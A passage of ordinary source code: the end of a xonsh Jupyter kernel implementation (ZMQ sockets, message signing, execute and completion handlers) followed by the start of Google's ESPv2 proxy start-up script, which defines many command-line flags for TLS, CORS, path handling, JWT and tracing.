p.add_argument("-f", dest="config_file", default=None)
self._parser = p
return self._parser
def make_default_config(self):
"""Provides default configuration"""
ns, unknown = self.parser.parse_known_args(sys.argv)
if ns.config_file is None:
self.dprint(1, "Starting xonsh kernel with default args...")
config = {
"control_port": 0,
"hb_port": 0,
"iopub_port": 0,
"ip": "127.0.0.1",
"key": str(uuid.uuid4()),
"shell_port": 0,
"signature_scheme": "hmac-sha256",
"stdin_port": 0,
"transport": "tcp",
}
else:
self.dprint(1, "Loading simple_kernel with args:", sys.argv)
self.dprint(1, "Reading config file {!r}...".format(ns.config_file))
with open(ns.config_file) as f:
config = json.load(f)
return config
def iopub_handler(self, message):
"""Handles iopub requests."""
self.dprint(2, "iopub received:", message)
def control_handler(self, wire_message):
"""Handles control requests"""
self.dprint(1, "control received:", wire_message)
identities, msg = self.deserialize_wire_message(wire_message)
if msg["header"]["msg_type"] == "shutdown_request":
self.shutdown()
def stdin_handler(self, message):
self.dprint(2, "stdin received:", message)
def start(self):
"""Starts the server"""
ioloop.install()
connection = self.config["transport"] + "://" + self.config["ip"]
secure_key = self.config["key"].encode()
digestmod = self.signature_schemes[self.config["signature_scheme"]]
self.auth = hmac.HMAC(secure_key, digestmod=digestmod)
# Heartbeat
ctx = zmq.Context()
self.heartbeat_socket = ctx.socket(zmq.REP)
self.config["hb_port"] = bind(
self.heartbeat_socket, connection, self.config["hb_port"]
)
# IOPub/Sub, aslo called SubSocketChannel in IPython sources
self.iopub_socket = ctx.socket(zmq.PUB)
self.config["iopub_port"] = bind(
self.iopub_socket, connection, self.config["iopub_port"]
)
self.iopub_stream = zmqstream.ZMQStream(self.iopub_socket)
self.iopub_stream.on_recv(self.iopub_handler)
# Control
self.control_socket = ctx.socket(zmq.ROUTER)
self.config["control_port"] = bind(
self.control_socket, connection, self.config["control_port"]
)
self.control_stream = zmqstream.ZMQStream(self.control_socket)
self.control_stream.on_recv(self.control_handler)
# Stdin:
self.stdin_socket = ctx.socket(zmq.ROUTER)
self.config["stdin_port"] = bind(
self.stdin_socket, connection, self.config["stdin_port"]
)
self.stdin_stream = zmqstream.ZMQStream(self.stdin_socket)
self.stdin_stream.on_recv(self.stdin_handler)
# Shell
self.shell_socket = ctx.socket(zmq.ROUTER)
self.config["shell_port"] = bind(
self.shell_socket, connection, self.config["shell_port"]
)
self.shell_stream = zmqstream.ZMQStream(self.shell_socket)
self.shell_stream.on_recv(self.shell_handler)
# start up configurtation
self.dprint(2, "Config:", json.dumps(self.config))
self.dprint(1, "Starting loops...")
self.hb_thread = threading.Thread(target=self.heartbeat_loop)
self.hb_thread.daemon = True
self.hb_thread.start()
self.dprint(1, "Ready! Listening...")
ioloop.IOLoop.instance().start()
def shutdown(self):
"""Shutsdown the kernel"""
self.exiting = True
ioloop.IOLoop.instance().stop()
def dprint(self, level, *args, **kwargs):
"""Print but with debug information."""
if level <= self.debug_level:
print("DEBUG" + str(level) + ":", file=sys.__stdout__, *args, **kwargs)
sys.__stdout__.flush()
def sign(self, messages):
"""Sign a message list with a secure signature."""
h = self.auth.copy()
for m in messages:
h.update(m)
return h.hexdigest().encode("ascii")
def new_header(self, message_type):
"""Make a new header"""
return {
"date": datetime.datetime.now().isoformat(),
"msg_id": str(uuid.uuid4()),
"username": "kernel",
"session": self.session_id,
"msg_type": message_type,
"version": "5.0",
}
def send(
self,
stream,
message_type,
content=None,
parent_header=None,
metadata=None,
identities=None,
):
"""Send data to the client via a stream"""
header = self.new_header(message_type)
if content is None:
content = {}
if parent_header is None:
parent_header = {}
if metadata is None:
metadata = {}
messages = list(map(dump_bytes, [header, parent_header, metadata, content]))
signature = self.sign(messages)
parts = [DELIM, signature] + messages
if identities:
parts = identities + parts
self.dprint(3, "send parts:", parts)
stream.send_multipart(parts)
if isinstance(stream, zmqstream.ZMQStream):
stream.flush()
def deserialize_wire_message(self, wire_message):
"""Split the routing prefix and message frames from a message on the wire"""
delim_idx = wire_message.index(DELIM)
identities = wire_message[:delim_idx]
m_signature = wire_message[delim_idx + 1]
msg_frames = wire_message[delim_idx + 2 :]
keys = ("header", "parent_header", "metadata", "content")
m = {k: load_bytes(v) for k, v in zip(keys, msg_frames)}
check_sig = self.sign(msg_frames)
if check_sig != m_signature:
raise ValueError("Signatures do not match")
return identities, m
def run_thread(self, loop, name):
"""Run main thread"""
self.dprint(2, "Starting loop for {name!r}...".format(name=name))
while not self.exiting:
self.dprint(2, "{} Loop!".format(name))
try:
loop.start()
except ZMQError as e:
self.dprint(1, "{} ZMQError!\n {}".format(name, e))
if e.errno == errno.EINTR:
continue
else:
raise
except Exception:
self.dprint(2, "{} Exception!".format(name))
if self.exiting:
break
else:
raise
else:
self.dprint(2, "{} Break!".format(name))
break
def heartbeat_loop(self):
"""Run heartbeat"""
self.dprint(2, "Starting heartbeat loop...")
while not self.exiting:
self.dprint(3, ".", end="")
try:
zmq.device(zmq.FORWARDER, self.heartbeat_socket, self.heartbeat_socket)
except zmq.ZMQError as e:
if e.errno == errno.EINTR:
continue
else:
raise
else:
break
def shell_handler(self, message):
"""Dispatch shell messages to their handlers"""
self.dprint(1, "received:", message)
identities, msg = self.deserialize_wire_message(message)
handler = getattr(self, "handle_" + msg["header"]["msg_type"], None)
if handler is None:
self.dprint(0, "unknown message type:", msg["header"]["msg_type"])
return
handler(msg, identities)
def handle_execute_request(self, message, identities):
"""Handle execute request messages."""
self.dprint(2, "Xonsh Kernel Executing:", pformat(message["content"]["code"]))
# Start by sending busy signal
content = {"execution_state": "busy"}
self.send(self.iopub_stream, "status", content, parent_header=message["header"])
# confirm the input that we are executing
content = {
"execution_count": self.execution_count,
"code": message["content"]["code"],
}
self.send(
self.iopub_stream, "execute_input", content, parent_header=message["header"]
)
# execute the code
metadata = {
"dependencies_met": True,
"engine": self.session_id,
"status": "ok",
"started": datetime.datetime.now().isoformat(),
}
content = self.do_execute(parent_header=message["header"], **message["content"])
self.send(
self.shell_stream,
"execute_reply",
content,
metadata=metadata,
parent_header=message["header"],
identities=identities,
)
self.execution_count += 1
# once we are done, send a signal that we are idle
content = {"execution_state": "idle"}
self.send(self.iopub_stream, "status", content, parent_header=message["header"])
def do_execute(
self,
code="",
silent=False,
store_history=True,
user_expressions=None,
allow_stdin=False,
parent_header=None,
**kwargs
):
"""Execute user code."""
if len(code.strip()) == 0:
return {
"status": "ok",
"execution_count": self.execution_count,
"payload": [],
"user_expressions": {},
}
shell = builtins.__xonsh__.shell
hist = builtins.__xonsh__.history
try:
shell.default(code, self, parent_header)
interrupted = False
except KeyboardInterrupt:
interrupted = True
if interrupted:
return {"status": "abort", "execution_count": self.execution_count}
rtn = 0 if (hist is None or len(hist) == 0) else hist.rtns[-1]
if 0 < rtn:
message = {
"status": "error",
"execution_count": self.execution_count,
"ename": "",
"evalue": str(rtn),
"traceback": [],
}
else:
message = {
"status": "ok",
"execution_count": self.execution_count,
"payload": [],
"user_expressions": {},
}
return message
def _respond_in_chunks(self, name, s, chunksize=1024, parent_header=None):
if s is None:
return
n = len(s)
if n == 0:
return
lower = range(0, n, chunksize)
upper = range(chunksize, n + chunksize, chunksize)
for l, u in zip(lower, upper):
response = {"name": name, "text": s[l:u]}
self.send(
self.iopub_socket, "stream", response, parent_header=parent_header
)
def handle_complete_request(self, message, identities):
"""Handles kernel info requests."""
content = self.do_complete(
message["content"]["code"], message["content"]["cursor_pos"]
)
self.send(
self.shell_stream,
"complete_reply",
content,
parent_header=message["header"],
identities=identities,
)
def do_complete(self, code, pos):
"""Get completions."""
shell = builtins.__xonsh__.shell
line = code.split("\n")[-1]
line = builtins.aliases.expand_alias(line)
prefix = line.split(" ")[-1]
endidx = pos
begidx = pos - len(prefix)
rtn, _ = self.completer.complete(prefix, line, begidx, endidx, shell.ctx)
if isinstance(rtn, Set):
rtn = list(rtn)
message = {
"matches": rtn,
"cursor_start": begidx,
"cursor_end": endidx,
"metadata": {},
"status": "ok",
}
return message
def handle_kernel_info_request(self, message, identities):
"""Handles kernel info requests."""
content = {
"protocol_version": "5.0",
"ipython_version": [1, 1, 0, ""],
"language": self.language,
"language_version": self.language_version,
"implementation": self.implementation,
"implementation_version": self.implementation_version,
"language_info": self.language_info,
"banner": self.banner,
}
self.send(
self.shell_stream,
"kernel_info_reply",
content,
parent_header=message["header"],
identities=identities,
)
if __name__ == "__main__":
setup(
shell_type="jupyter",
env={"PAGER": "cat"},
aliases={"less": "cat"},
xontribs=["coreutils"],
threadable_predictors={"git": predict_true, "man": predict_true},
)
if builtins.__xonsh__.commands_cache.is_only_functional_alias("cat"):
# this is needed if the underlying system doesn't have cat
# we supply our own, because we can
builtins.aliases["cat"] = "xonsh-cat"
builtins.__xonsh__.env["PAGER"] = "xonsh-cat"
shell = builtins.__xonsh__.shell
kernel = shell.kernel = XonshKernel()
kernel.start()
|
start_proxy.py | # Copyright 2019 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import re
import signal
import subprocess
import sys
import threading
import time
# The command to generate Envoy bootstrap config
BOOTSTRAP_CMD = "bin/bootstrap"
# Location of Config Manager and Envoy binary
CONFIGMANAGER_BIN = "bin/configmanager"
ENVOY_BIN = "bin/envoy"
# Health check period in secs, for Config Manager and Envoy.
HEALTH_CHECK_PERIOD = 60
# bootstrap config file will write here.
# By default, envoy writes some logs to /tmp too
# If root file system is read-only, this folder should be
# mounted from tmpfs.
DEFAULT_CONFIG_DIR = "/tmp"
# bootstrap config file name.
BOOTSTRAP_CONFIG = "/bootstrap.json"
# Default Listener port
DEFAULT_LISTENER_PORT = 8080
# Default backend
DEFAULT_BACKEND = "http://127.0.0.1:8082"
# Default rollout_strategy
DEFAULT_ROLLOUT_STRATEGY = "fixed"
# Google default application credentials environment variable
GOOGLE_CREDS_KEY = "GOOGLE_APPLICATION_CREDENTIALS"
# Flag defaults when running on serverless.
SERVERLESS_PLATFORM = "Cloud Run(ESPv2)"
SERVERLESS_XFF_NUM_TRUSTED_HOPS = 0
def gen_bootstrap_conf(args):
cmd = [BOOTSTRAP_CMD, "--logtostderr"]
cmd.extend(["--admin_port", str(args.status_port)])
if args.http_request_timeout_s:
cmd.extend(
["--http_request_timeout_s",
str(args.http_request_timeout_s)])
bootstrap_file = DEFAULT_CONFIG_DIR + BOOTSTRAP_CONFIG
cmd.append(bootstrap_file)
print(cmd)
return cmd
class ArgumentParser(argparse.ArgumentParser):
def error(self, message):
self.print_help(sys.stderr)
self.exit(1, '%s: error: %s\n' % (self.prog, message))
# Notes: These flags should get aligned with that of ESP at
# https://github.com/cloudendpoints/esp/blob/master/start_esp/start_esp.py#L420
def make_argparser():
parser = ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='''
ESPv2 start-up script. This script starts Config Manager and Envoy.
The service name and config ID are optional. If not supplied, the Config Manager
fetches the service name and the config ID from the metadata service as
attributes "service_name" and "service_config_id".
ESPv2 relies on the metadata service to fetch access tokens for Google
services. If you deploy ESPv2 outside of Google Cloud environment, you need
to provide a service account credentials file by setting "creds_key"
environment variable or by passing "-k" flag to this script.
''')
parser.add_argument(
'-s',
'--service',
default="",
help=''' Set the name of the Endpoints service. If omitted and -c not
specified, ESPv2 contacts the metadata service to fetch the service
name. ''')
parser.add_argument(
'-v',
'--version',
default="",
help=''' Set the service config ID of the Endpoints service.
If omitted and -c not specified, ESPv2 contacts the metadata
service to fetch the service config ID. ''')
parser.add_argument(
'--service_json_path',
default=None,
help='''
Specify a path for ESPv2 to load the endpoint service config.
With this flag, ESPv2 will use "fixed" rollout strategy and following
flags will be ignored:
--service, --version, and --rollout_strategy.
''')
parser.add_argument(
'-a',
'--backend',
default=DEFAULT_BACKEND,
help='''
Specify the local backend application server address
when using ESPv2 as a sidecar.
Default value is {backend}. Follow the same format when setting
manually. Valid schemes are `http`, `https`, `grpc`, and `grpcs`.
See the flag --enable_backend_address_override for details on how ESPv2
decides between using this flag vs using the backend addresses specified
in the service configuration.
'''.format(backend=DEFAULT_BACKEND))
parser.add_argument(
'--enable_backend_address_override',
action='store_true',
help='''
Backend addresses can be specified using either the --backend flag
or the `backend.rule.address` field in the service configuration.
For OpenAPI users, note the `backend.rule.address` field is set
by the `address` field in the `x-google-backend` extension.
`backend.rule.address` is usually specified when routing to different
backends based on the route.
By default, the `backend.rule.address` will take priority over
the --backend flag for each individual operation.
Enable this flag if you want the --backend flag to take priority
instead. This is useful if you are developing on a local workstation.
Then you use a the same production service config but override the
backend address via the --backend flag for local testing.
Note: Only the address will be overridden.
All other components of `backend.rule` will still apply
(deadlines, backend auth, path translation, etc).
''')
parser.add_argument('--listener_port', default=None, type=int, help='''
The port to accept downstream connections.
It supports HTTP/1.x, HTTP/2, and gRPC connections.
Default is {port}'''.format(port=DEFAULT_LISTENER_PORT))
parser.add_argument('-N', '--status_port', '--admin_port', default=0,
type=int, help=''' Enable ESPv2 Envoy admin on this port. Please refer
to https://www.envoyproxy.io/docs/envoy/latest/operations/admin.
By default the admin port is disabled.''')
parser.add_argument('--ssl_server_cert_path', default=None, help='''
Proxy's server cert path. When configured, ESPv2 only accepts HTTP/1.x and
HTTP/2 secure connections on listener_port. Requires the certificate and
key files "server.crt" and "server.key" within this path.
Before using this feature, please make sure TLS isn't terminated before ESPv2
in your deployment model. In general, Cloud Run, GKE(GCLB enforced in ingress)
and GCE with GCLB configured terminates TLS before ESPv2. If that's the case,
please don't set up flag.
''')
parser.add_argument('--ssl_server_cipher_suites', default=None, help='''
Cipher suites to use for downstream connections as a comma-separated list.
Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/common.proto#auth-tlsparameters''')
parser.add_argument('--ssl_server_root_cert_path', default=None, help='''
The file path of root certificates that ESPv2 uses to verify downstream client certificate.
If not specified, ESPv2 doesn't verify client certificates by default.
Before using this feature, please make sure mTLS isn't terminated before ESPv2
in your deployment model. In general, Cloud Run, GKE with container-native load balancing
and GCE with GCLB configured terminates mTLS before ESPv2. If that's the case,
please don't set up flag.
''')
parser.add_argument('--ssl_backend_client_cert_path', default=None, help='''
Proxy's client cert path. When configured, ESPv2 enables TLS mutual
authentication for HTTPS backends. Requires the certificate and
key files "client.crt" and "client.key" within this path.''')
parser.add_argument('--ssl_backend_client_root_certs_file', default=None, help='''
The file path of root certificates that ESPv2 uses to verify backend server certificate.
If not specified, ESPv2 uses '/etc/ssl/certs/ca-certificates.crt' by default.''')
parser.add_argument('--ssl_backend_client_cipher_suites', default=None, help='''
Cipher suites to use for HTTPS backends as a comma-separated list.
Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/common.proto#auth-tlsparameters''')
parser.add_argument('--ssl_minimum_protocol', default=None,
choices=['TLSv1.0', 'TLSv1.1', 'TLSv1.2', 'TLSv1.3'],
help=''' Minimum TLS protocol version for client side connection.
Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/cert.proto#common-tls-configuration.
''')
parser.add_argument('--ssl_maximum_protocol', default=None,
choices=['TLSv1.0', 'TLSv1.1', 'TLSv1.2', 'TLSv1.3'],
help=''' Maximum TLS protocol version for client side connection.
Please refer to https://www.envoyproxy.io/docs/envoy/latest/api-v2/api/v2/auth/cert.proto#common-tls-configuration.
''')
parser.add_argument('--enable_strict_transport_security', action='store_true',
help='''Enable HSTS (HTTP Strict Transport Security). "Strict-Transport-Security" response header
with value "max-age=31536000; includeSubdomains;" is added for all responses from local backend.
Not valid for remote backends.''')
parser.add_argument('--generate_self_signed_cert', action='store_true',
help='''Generate a self-signed certificate and key at start, then
store them in /tmp/ssl/endpoints/server.crt and /tmp/ssl/endponts/server.key.
This is useful when only a random self-sign cert is needed to serve
HTTPS requests. Generated certificate will have Common Name
"localhost" and valid for 10 years.
''')
parser.add_argument('-z', '--healthz', default=None, help='''Define a
health checking endpoint on the same ports as the application backend.
For example, "-z healthz" makes ESPv2 return code 200 for location
"/healthz", instead of forwarding the request to the backend. Please
don't use any paths conflicting with your normal requests.
Default: not used.''')
parser.add_argument('--add_request_header', default=None, action='append', help='''
Add a HTTP header to the request before sent to the upstream backend.
If the header is already in the request, its value will be replaced with the new one.
It supports envoy variable defined at https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_conn_man/headers#custom-request-response-headers.
This argument can be repeated multiple times to specify multiple headers.
For example: --add_request_header=key1=value1 --add_request_header=key2=value2.''')
parser.add_argument('--append_request_header', default=None, action='append', help='''
Append a HTTP header to the request before sent to the upstream backend.
If the header is already in the request, the new value will be appended.
It supports envoy variable defined at https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_conn_man/headers#custom-request-response-headers.
This argument can be repeated multiple times to specify multiple headers.
For example: --append_request_header=key1=value1 --append_request_header=key2=value2.''')
parser.add_argument('--add_response_header', default=None, action='append', help='''
Add a HTTP header to the response before sent to the downstream client.
If the header is already in the response, it will be replaced with the new one.
It supports envoy variable defined at https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_conn_man/headers#custom-request-response-headers.
This argument can be repeated multiple times to specify multiple headers.
For example: --add_response_header=key1=value1 --add_response_header=key2=value2.''')
parser.add_argument('--append_response_header', default=None, action='append', help='''
Append a HTTP header to the response before sent to the downstream client.
If the header is already in the response, the new one will be appended.
It supports envoy variable defined at https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_conn_man/headers#custom-request-response-headers.
This argument can be repeated multiple times to specify multiple headers.
For example: --append_response_header=key1=value1 --append_response_header=key2=value2.''')
parser.add_argument(
'--enable_operation_name_header',
action='store_true',
help='''
When enabled, ESPv2 will attach the operation name of the matched route
in the request to the backend.
The operation name:
- For OpenAPI: Is derived from the `operationId` field.
- For gRPC: Is the fully-qualified name of the RPC.
The header will be attached with key `X-Endpoint-API-Operation-Name`.
NOTE: We do NOT recommend relying on this feature. There are no
guarantees that the operation name will remain consistent across
multiple service configuration IDs.
NOTE: If you are using this feature with OpenAPI,
please only use the last segment of the operation name. For example:
`1.echo_api_endpoints_cloudesf_testing_cloud_goog.EchoHeader`
Your backend should parse past the last `.` and only use `EchoHeader`.
NOTE: For OpenAPI, the operation name may not match the `operationId`
field exactly. For example, some sanitization may occur that only allows
alphanumeric characters. The exact sanitization is internal
implementation detail and is not guaranteed to be consistent.
'''
)
parser.add_argument(
'-R',
'--rollout_strategy',
default=DEFAULT_ROLLOUT_STRATEGY,
help='''The service config rollout strategy, [fixed|managed],
Default value: {strategy}'''.format(strategy=DEFAULT_ROLLOUT_STRATEGY),
choices=['fixed', 'managed'])
# Customize management service url prefix.
parser.add_argument(
'-g',
'--management',
default=None,
help=argparse.SUPPRESS)
# CORS presets
parser.add_argument(
'--cors_preset',
default=None,
help='''
Enables setting of CORS headers. This is useful when using a GRPC
backend, since a GRPC backend cannot set CORS headers.
Specify one of available presets to configure CORS response headers
in nginx. Defaults to no preset and therefore no CORS response
headers. If no preset is suitable for the use case, use the
--nginx_config arg to use a custom nginx config file.
Available presets:
- basic - Assumes all location paths have the same CORS policy.
Responds to preflight OPTIONS requests with an empty 204, and the
results of preflight are allowed to be cached for up to 20 days
(1728000 seconds). See descriptions for args --cors_allow_origin,
--cors_allow_methods, --cors_allow_headers, --cors_expose_headers,
--cors_allow_credentials for more granular configurations.
- cors_with_regex - Same as basic preset, except that specifying
allowed origins in regular expression. See descriptions for args
--cors_allow_origin_regex, --cors_allow_methods,
--cors_allow_headers, --cors_expose_headers, --cors_allow_credentials
for more granular configurations.
''')
parser.add_argument(
'--cors_allow_origin',
default='*',
help='''
Only works when --cors_preset is 'basic'. Configures the CORS header
Access-Control-Allow-Origin. Defaults to "*" which allows all origins.
''')
parser.add_argument(
'--cors_allow_origin_regex',
default='',
help='''
Only works when --cors_preset is 'cors_with_regex'. Configures the
whitelists of CORS header Access-Control-Allow-Origin with regular
expression.
''')
parser.add_argument(
'--cors_allow_methods',
default='GET, POST, PUT, PATCH, DELETE, OPTIONS',
help='''
Only works when --cors_preset is in use. Configures the CORS header
Access-Control-Allow-Methods. Defaults to allow common HTTP
methods.
''')
parser.add_argument(
'--cors_allow_headers',
default=
'DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization',
help='''
Only works when --cors_preset is in use. Configures the CORS header
Access-Control-Allow-Headers. Defaults to allow common HTTP
headers.
''')
parser.add_argument(
'--cors_expose_headers',
default='Content-Length,Content-Range',
help='''
Only works when --cors_preset is in use. Configures the CORS header
Access-Control-Expose-Headers. Defaults to allow common response headers.
''')
parser.add_argument(
'--cors_allow_credentials',
action='store_true',
help='''
Only works when --cors_preset is in use. Enable the CORS header
Access-Control-Allow-Credentials. By default, this header is disabled.
''')
parser.add_argument(
'--cors_max_age',
default='480h',
help='''
Only works when --cors_preset is in use. Configures the CORS header
Access-Control-Max-Age. Defaults to 20 days (1728000 seconds).
The acceptable format is a sequence of decimal numbers, each with
optional fraction and a unit suffix, such as "300m", "1.5h" or "2h45m".
Valid time units are "m" for minutes, "h" for hours.
''')
parser.add_argument(
'--check_metadata',
action='store_true',
help='''Enable fetching service name, service config ID and rollout
strategy from the metadata service.''')
parser.add_argument('--underscores_in_headers', action='store_true',
help='''Allow headers contain underscores to pass through. By default
ESPv2 rejects requests that have headers with underscores.''')
parser.add_argument('--disable_normalize_path', action='store_true',
help='''Disable normalization of the `path` HTTP header according to
RFC 3986. It is recommended to keep this option enabled if your backend
performs path normalization by default.
The following table provides examples of the request `path` the backend
will receive from ESPv2 based on the configuration of this flag.
-----------------------------------------------------------------
| Request Path | Without Normalization | With Normalization |
-----------------------------------------------------------------
| /hello/../world | Rejected | /world |
| /%%4A | /%%4A | /J |
| /%%4a | /%%4a | /J |
-----------------------------------------------------------------
By default, ESPv2 will normalize paths.
Disable the feature only if your traffic is affected by the behavior.
Note: Following RFC 3986, this option does not unescape percent-encoded
slash characters. See flag `--disallow_escaped_slashes_in_path` to
enable this non-compliant behavior.
Note: Case normalization from RFC 3986 is not supported, even if this
option is enabled.
For more details, see:
https://cloud.google.com/api-gateway/docs/path-templating''')
parser.add_argument('--disable_merge_slashes_in_path', action='store_true',
help='''Disable merging of adjacent slashes in the `path` HTTP header.
It is recommended to keep this option enabled if your backend
performs merging by default.
The following table provides examples of the request `path` the backend
will receive from ESPv2 based on the configuration of this flag.
-----------------------------------------------------------------
| Request Path | Without Normalization | With Normalization |
-----------------------------------------------------------------
| /hello//world | Rejected | /hello/world |
| /hello/// | Rejected | /hello |
-----------------------------------------------------------------
By default, ESPv2 will merge slashes.
Disable the feature only if your traffic is affected by the behavior.
For more details, see:
https://cloud.google.com/api-gateway/docs/path-templating''')
parser.add_argument('--disallow_escaped_slashes_in_path',
action='store_true',
help='''
Disallows requests with escaped percent-encoded slash characters:
- %%2F or %%2f is treated as a /
- %%5C or %%5c is treated as a \
When enabled, the behavior depends on the protocol:
- For OpenAPI backends, request paths with unescaped percent-encoded
slashes will be automatically escaped via a redirect.
- For gRPC backends, request paths with unescaped percent-encoded
slashes will be rejected (gRPC does not support redirects).
This option is **not** RFC 3986 compliant,
so it is turned off by default.
If your backend is **not** RFC 3986 compliant and escapes slashes,
you **must** enable this option in ESPv2.
This will prevent against path confusion attacks that result in security
requirements not being enforced.
For more details, see:
https://cloud.google.com/api-gateway/docs/path-templating
and
https://github.com/envoyproxy/envoy/security/advisories/GHSA-4987-27fx-x6cf
''')
parser.add_argument(
'--envoy_use_remote_address',
action='store_true',
default=False,
help='''Envoy HttpConnectionManager configuration, please refer to envoy
documentation for detailed information.''')
parser.add_argument(
'--envoy_xff_num_trusted_hops',
default=None,
help='''Envoy HttpConnectionManager configuration, please refer to envoy
documentation for detailed information. The default value is 2 for
sidecar deployments and 0 for serverless deployments.''')
parser.add_argument(
'--envoy_connection_buffer_limit_bytes', action=None,
help='''
Configure the maximum amount of data that is buffered for each
request/response body, in bytes. If not set, default is decided by
Envoy.
https://www.envoyproxy.io/docs/envoy/latest/api-v3/config/listener/v3/listener.proto
''')
parser.add_argument(
'--log_request_headers',
default=None,
help='''Log corresponding request headers through
service control, separated by comma. Example, when
--log_request_headers=foo,bar, endpoint log will have
request_headers: foo=foo_value;bar=bar_value if values are available;
''')
parser.add_argument(
'--log_response_headers',
default=None,
help='''Log corresponding response headers through
service control, separated by comma. Example, when
--log_response_headers=foo,bar, endpoint log will have
response_headers: foo=foo_value;bar=bar_value if values are available;
''')
parser.add_argument(
'--log_jwt_payloads',
default=None,
help='''
Log corresponding JWT JSON payload primitive fields through service control,
separated by comma. Example, when --log_jwt_payload=sub,project_id, log
will have jwt_payload: sub=[SUBJECT];project_id=[PROJECT_ID]
if the fields are available. The value must be a primitive field,
JSON objects and arrays will not be logged.
''')
parser.add_argument('--service_control_network_fail_policy',
default='open', choices=['open', 'close'], help='''
Specify the policy to handle the request in case of network failures when
connecting to Google service control. If it is `open`, the request will be allowed,
otherwise, it will be rejected. Default is `open`.
''')
parser.add_argument(
'--disable_jwks_async_fetch',
action='store_true',
default=False,
help='''
Disable fetching JWKS for JWT authentication to be done before processing any requests.
If disabled, JWKS fetching is done when authenticating the JWT, the fetching will add
to the request processing latency. Default is enabled.'''
)
parser.add_argument(
'--jwks_cache_duration_in_s',
default=None,
help='''
Specify JWT public key cache duration in seconds. The default is 5 minutes.'''
)
parser.add_argument(
'--jwks_fetch_num_retries',
default=None,
help='''
Specify the remote JWKS fetch retry policy's number of retries. default None.'''
)
parser.add_argument(
'--jwks_fetch_retry_back_off_base_interval_ms',
default=None,
help='''
Specify JWKS fetch retry exponential back off base interval in milliseconds. default 200 ms if not set'''
)
parser.add_argument(
'--jwks_fetch_retry_back_off_max_interval_ms',
default=None,
help='''
Specify JWKS fetch retry exponential back off maximum interval in milliseconds. default 32s if not set.'''
)
parser.add_argument(
'--http_request_timeout_s',
default=None, type=int,
help='''
Set the timeout in seconds for all requests made to all external services
from ESPv2 (ie. Service Management, Instance Metadata Server, etc.).
This timeout does not apply to requests proxied to the backend.
Must be > 0 and the default is 30 seconds if not set.
''')
parser.add_argument(
'--service_control_check_timeout_ms',
default=None,
help='''
Set the timeout in millisecond for service control Check request.
Must be > 0 and the default is 1000 if not set. Default
''')
parser.add_argument(
'--service_control_quota_timeout_ms',
default=None,
help='''
Set the timeout in millisecond for service control Quota request.
Must be > 0 and the default is 1000 if not set.
''')
parser.add_argument(
'--service_control_report_timeout_ms',
default=None,
help='''
Set the timeout in millisecond for service control Report request.
Must be > 0 and the default is 2000 if not set.
''')
parser.add_argument(
'--service_control_check_retries',
default=None,
help='''
Set the retry times for service control Check request.
Must be >= 0 and the default is 3 if not set.
''')
parser.add_argument(
'--service_control_quota_retries',
default=None,
help='''
Set the retry times for service control Quota request.
Must be >= 0 and the default is 1 if not set.
''')
parser.add_argument(
'--service_control_report_retries',
default=None,
help='''
Set the retry times for service control Report request.
Must be >= 0 and the default is 5 if not set.
''')
parser.add_argument(
'--backend_retry_ons',
default=None,
help='''
The conditions under which ESPv2 does retry on the backends. One or more
retryOn conditions can be specified by comma-separated list.
The default is `reset,connect-failure,refused-stream`. Disable retry by
setting this flag to empty.
All the retryOn conditions are defined in the
x-envoy-retry-on(https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_filters/router_filter#x-envoy-retry-on) and
x-envoy-retry-grpc-on(https://www.envoyproxy.io/docs/envoy/latest/configuration/http/http_filters/router_filter#x-envoy-retry-on).
''')
parser.add_argument(
'--backend_retry_on_status_codes',
default=None,
help='''
The list of backend http status codes will be retried, in
addition to the status codes enabled for retry through other retry
policies set in `--backend_retry_ons`.
The format is a comma-delimited String, like "501, 503".
''')
parser.add_argument(
'--backend_retry_num',
default=None,
help='''
The allowed number of retries. Must be >= 0 and defaults to 1.
''')
parser.add_argument(
'--backend_per_try_timeout',
default=None,
help='''
The backend timeout per retry attempt. Valid time units are "ns", "us",
"ms", "s", "m", "h".
Please note the `deadline` in the `x-google-backend` extension is the
total time wait for a full response from one request, including all
retries. If the flag is unspecified, ESPv2 will use the `deadline` in
the `x-google-backend` extension. Consequently, a request that times out
will not be retried as the total timeout budget would have been exhausted.
''')
parser.add_argument(
'--access_log',
help='''
Path to a local file to which the access log entries will be written.
'''
)
parser.add_argument(
'--access_log_format',
help='''
String format to specify the format of access log. If unset, the
following format will be used.
https://www.envoyproxy.io/docs/envoy/latest/configuration/observability/access_log#default-format-string
For the detailed format grammar, please refer to the following document.
https://www.envoyproxy.io/docs/envoy/latest/configuration/observability/access_log#format-strings
'''
)
parser.add_argument(
'--disable_tracing',
action='store_true',
default=False,
help='''
Disable Stackdriver tracing. By default, tracing is enabled with 1 out
of 1000 requests being sampled. This sampling rate can be changed with
the --tracing_sample_rate flag.
'''
)
parser.add_argument(
'--tracing_project_id',
default="",
help="The Google project id for Stack driver tracing")
parser.add_argument(
'--tracing_sample_rate',
help='''
Tracing sampling rate from 0.0 to 1.0.
By default, 1 out of 1000 requests are sampled.
Cloud trace can still be enabled from request HTTP headers with
trace context regardless this flag value.
'''
)
parser.add_argument(
'--disable_cloud_trace_auto_sampling',
action='store_true',
default=False,
help="An alias to override --tracing_sample_rate to 0")
parser.add_argument(
'--tracing_incoming_context',
default="",
help='''
Comma separated incoming trace contexts (traceparent|grpc-trace-bin|x-cloud-trace-context).
Note the order matters. Default is 'traceparent,x-cloud-trace-context'.
See official documentation for more details:
https://cloud.google.com/endpoints/docs/openapi/tracing'''
)
parser.add_argument(
'--tracing_outgoing_context',
default="",
help='''
